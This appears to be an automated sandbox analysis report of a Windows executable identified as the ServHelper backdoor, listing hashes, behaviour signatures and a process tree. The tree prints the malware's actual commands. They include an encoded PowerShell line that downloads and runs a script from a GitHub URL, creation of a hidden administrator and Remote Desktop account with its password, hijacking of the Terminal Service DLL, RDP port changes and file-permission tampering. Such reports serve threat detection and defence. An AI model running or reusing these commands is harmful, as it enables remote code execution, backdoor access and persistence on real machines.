Analysis
-
max time kernel
125s -
max time network
116s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
02-07-2021 06:03
Static task
static1
Behavioral task
behavioral1
Sample
b8c76065042d1557af857a48a5ac0f3e.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
b8c76065042d1557af857a48a5ac0f3e.exe
Resource
win10v20210408
General
-
Target
b8c76065042d1557af857a48a5ac0f3e.exe
-
Size
5.7MB
-
MD5
b8c76065042d1557af857a48a5ac0f3e
-
SHA1
7b5077cd4aaa5c97a768e9722828ebac94abe1f8
-
SHA256
e5dcf030290fd293d259f1c8ffbb65328c371e07fa34419af7723429599a7f6e
-
SHA512
59aa84a81ac66288b0d9b2d160ce6c3895d5a02bd48bceff659aeaf21df28c4996585378d302535f50b06d0592d65b5e6612714f7bec4d0df39e9bf514d54eba
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 11 588 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 1708 icacls.exe 544 icacls.exe 1040 icacls.exe 1604 takeown.exe 1384 icacls.exe 1156 icacls.exe 616 icacls.exe 1512 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral1/files/0x00040000000130df-180.dat upx behavioral1/files/0x00050000000130e0-181.dat upx -
Loads dropped DLL 2 IoCs
pid Process 1252 Process not Found 1252 Process not Found -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 1708 icacls.exe 544 icacls.exe 1040 icacls.exe 1604 takeown.exe 1384 icacls.exe 1156 icacls.exe 616 icacls.exe 1512 icacls.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
description ioc Process File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ff552fc3-698a-4f90-ae6d-431a1a948633 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5ecff6fb-e1e6-42d8-9f10-9fe7e38e9d16 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_590fac5a-ef3e-4089-9aec-88ecc619c530 powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fb7bdc71-2ce2-4065-b779-5b9a61d5e219 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1cfd80b7-443e-4421-b28d-069950fa769d powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_67bf5e67-49ef-47f0-b0eb-22a8f7d04708 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_419d8e7c-b0c1-42e6-923f-981e9d632e52 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1R6MW5CJJJI98IVAILP1.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_79fe2896-55c0-4166-884e-3c0da1e6969f powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f9e9d9a3-f38d-4be8-aabe-1b9063f81b41 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235ae516-41ab-473b-8dac-dbbdbec499b5 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_19b5cc9c-3f9f-4967-ac29-73280a9f35ef powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0d46a93076fd701 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 1004 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 872 powershell.exe 872 powershell.exe 588 powershell.exe 588 powershell.exe 768 powershell.exe 768 powershell.exe 1332 powershell.exe 1332 powershell.exe 872 powershell.exe 872 powershell.exe 872 powershell.exe 588 powershell.exe 588 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 464 Process not Found 1252 Process not Found 1252 Process not Found 1252 Process not Found 1252 Process not Found -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 872 powershell.exe Token: SeDebugPrivilege 588 powershell.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 1332 powershell.exe Token: SeRestorePrivilege 1156 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1696 WMIC.exe Token: SeIncreaseQuotaPrivilege 1696 WMIC.exe Token: SeAuditPrivilege 1696 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1696 WMIC.exe Token: SeIncreaseQuotaPrivilege 1696 WMIC.exe Token: SeAuditPrivilege 1696 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1552 WMIC.exe Token: SeIncreaseQuotaPrivilege 1552 WMIC.exe Token: SeAuditPrivilege 1552 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1552 WMIC.exe Token: SeIncreaseQuotaPrivilege 1552 WMIC.exe Token: SeAuditPrivilege 1552 WMIC.exe Token: SeDebugPrivilege 588 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1268 wrote to memory of 872 1268 b8c76065042d1557af857a48a5ac0f3e.exe 29 PID 1268 wrote to memory of 872 1268 b8c76065042d1557af857a48a5ac0f3e.exe 29 PID 1268 wrote to memory of 872 1268 b8c76065042d1557af857a48a5ac0f3e.exe 29 PID 872 wrote to memory of 1512 872 powershell.exe 31 PID 872 wrote to memory of 1512 872 powershell.exe 31 PID 872 wrote to memory of 1512 872 powershell.exe 31 PID 1512 wrote to memory of 1036 1512 csc.exe 32 PID 1512 wrote to memory of 1036 1512 csc.exe 32 PID 1512 wrote to memory of 1036 1512 csc.exe 32 PID 872 wrote to memory of 588 872 powershell.exe 33 PID 872 wrote to memory of 588 872 powershell.exe 33 PID 872 wrote to memory of 588 872 powershell.exe 33 PID 872 wrote to memory of 768 872 powershell.exe 35 PID 872 wrote to memory of 768 872 powershell.exe 35 PID 872 wrote to memory of 768 872 powershell.exe 35 PID 872 wrote to memory of 1332 872 powershell.exe 37 PID 872 wrote to memory of 1332 872 powershell.exe 37 PID 872 wrote to memory of 1332 872 powershell.exe 37 PID 872 wrote to memory of 1604 872 powershell.exe 40 PID 872 wrote to memory of 1604 872 powershell.exe 40 PID 872 wrote to memory of 1604 872 powershell.exe 40 PID 872 wrote to memory of 1384 872 powershell.exe 41 PID 872 wrote to memory of 1384 872 powershell.exe 41 PID 872 wrote to memory of 1384 872 powershell.exe 41 PID 872 wrote to memory of 1156 872 powershell.exe 42 PID 872 wrote to memory of 1156 872 powershell.exe 42 PID 872 wrote to memory of 1156 872 powershell.exe 42 PID 872 wrote to memory of 616 872 powershell.exe 43 PID 872 wrote to memory of 616 872 powershell.exe 43 PID 872 wrote to memory of 616 872 powershell.exe 43 PID 872 wrote to memory of 1512 872 powershell.exe 44 PID 872 wrote to memory of 1512 872 powershell.exe 44 PID 872 wrote to memory of 1512 872 powershell.exe 44 PID 872 wrote to memory of 1708 872 powershell.exe 45 PID 872 wrote to memory of 1708 872 powershell.exe 45 PID 872 wrote to memory of 1708 872 powershell.exe 45 PID 872 wrote to memory of 544 872 powershell.exe 46 PID 872 wrote to memory of 544 872 powershell.exe 46 PID 872 wrote to memory of 544 872 powershell.exe 46 PID 872 wrote to memory of 1040 872 powershell.exe 47 PID 872 wrote to memory of 1040 872 powershell.exe 47 PID 872 wrote to memory of 1040 872 powershell.exe 47 PID 872 wrote to memory of 588 872 powershell.exe 48 PID 872 wrote to memory of 588 872 powershell.exe 48 PID 872 wrote to memory of 588 872 powershell.exe 48 PID 872 wrote to memory of 1004 872 powershell.exe 49 PID 872 wrote to memory of 1004 872 powershell.exe 49 PID 872 wrote to memory of 1004 872 powershell.exe 49 PID 872 wrote to memory of 1696 872 powershell.exe 50 PID 872 wrote to memory of 1696 872 powershell.exe 50 PID 872 wrote to memory of 1696 872 powershell.exe 50 PID 872 wrote to memory of 1640 872 powershell.exe 51 PID 872 wrote to memory of 1640 872 powershell.exe 51 PID 872 wrote to memory of 1640 872 powershell.exe 51 PID 1640 wrote to memory of 1648 1640 net.exe 52 PID 1640 wrote to memory of 1648 1640 net.exe 52 PID 1640 wrote to memory of 1648 1640 net.exe 52 PID 872 wrote to memory of 1756 872 powershell.exe 53 PID 872 wrote to memory of 1756 872 powershell.exe 53 PID 872 wrote to memory of 1756 872 powershell.exe 53 PID 1756 wrote to memory of 1796 1756 cmd.exe 54 PID 1756 wrote to memory of 1796 1756 cmd.exe 54 PID 1756 wrote to memory of 1796 1756 cmd.exe 54 PID 1796 wrote to memory of 676 1796 cmd.exe 55
Processes
-
C:\Users\Admin\AppData\Local\Temp\b8c76065042d1557af857a48a5ac0f3e.exe"C:\Users\Admin\AppData\Local\Temp\b8c76065042d1557af857a48a5ac0f3e.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i0fjt4sj\i0fjt4sj.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES166E.tmp" "c:\Users\Admin\AppData\Local\Temp\i0fjt4sj\CSCACD5129E7C3F46958A1589509327CC7F.TMP"4⤵PID:1036
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1604
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1384
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1156
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:616
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1512
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1708
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:544
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1040
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:588
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1004
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1696
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1640 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1648
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1712
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1088
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:1156
-
C:\Windows\system32\net.exenet start TermService5⤵PID:1772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1728
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:1160
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1496
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:856
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1696
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:292
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc vRLTzGmU /add1⤵PID:316
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc vRLTzGmU /add2⤵PID:1384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc vRLTzGmU /add3⤵PID:676
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:1496
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:832
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1160
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD1⤵PID:1548
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD2⤵PID:1796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD3⤵PID:1756
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:316
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1004
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc vRLTzGmU1⤵PID:1512
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc vRLTzGmU2⤵PID:1552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc vRLTzGmU3⤵PID:1660
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:588
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1696
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1832
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1700
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:544
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:588
-
-